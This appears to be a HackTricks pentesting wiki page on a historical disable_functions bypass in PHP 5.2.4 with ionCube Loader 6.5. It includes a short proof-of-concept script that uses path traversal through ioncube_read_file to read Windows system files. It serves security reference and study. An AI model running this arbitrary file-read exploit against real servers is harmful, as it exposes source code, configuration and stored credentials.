disable-functions-php-5-2-4-ioncube-extension-exploit.md (2606B)
1 --- 2 title: "PHP 5.2.4 ionCube Extension File-Read Bypass" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # PHP 5.2.4 ionCube Extension File-Read Bypass 14 15 This historical proof of concept, credited to shinnai, targeted PHP 5.2.4 with ionCube Loader 6.5 on Windows. Even when `readfile` and `ioncube_read_file` were listed in `disable_functions`, the extension's file-reading function could be used to retrieve files outside the intended restriction. The original report was tested with `ioncube_loader_win_5.2.dll`; do not generalize the result to other PHP or ionCube versions without verification.<sup>[[1]](#references)[[2]](#references)</sup> 16 17 The impact is an arbitrary file read in the PHP process context, which can expose PHP source, configuration files, or stored credentials. The original advisory also highlighted the extension's `ioncube_write_file` function as an additional surface, although this proof of concept demonstrates only the read primitive.<sup>[[1]](#references)</sup> 18 19 ```php 20 <?php 21 /* 22 * PHP 5.2.4 / ionCube Loader 6.5 historical proof of concept. 23 * Original author: shinnai 24 * Original environment: Windows XP Professional SP2, CLI and Apache. 25 * php.ini: 26 * safe_mode = On 27 * disable_functions = ioncube_read_file, readfile 28 */ 29 30 if (!extension_loaded('ionCube Loader')) { 31 die('ionCube Loader extension required!'); 32 } 33 34 $path = str_repeat('..\\', 20); 35 36 // Baseline call expected to be blocked by disable_functions. 37 $readfileOutput = readfile($path . 'windows\\system.ini'); 38 39 // Historical bypass through the extension function. 40 $ioncubeOutput = ioncube_read_file($path . 'boot.ini'); 41 42 echo $readfileOutput; 43 echo '<br><br>ionCube output:<br><br>'; 44 echo $ioncubeOutput; 45 ?> 46 ``` 47 48 ## References 49 50 - [1] [Exploit-DB 4517 - PHP 5.2.4 ionCube `ioncube_read_file` safe-mode/`disable_functions` bypass](https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/local/4517.php) 51 - [2] [shinnai's historical security-research site](http://shinnai.altervista.org/)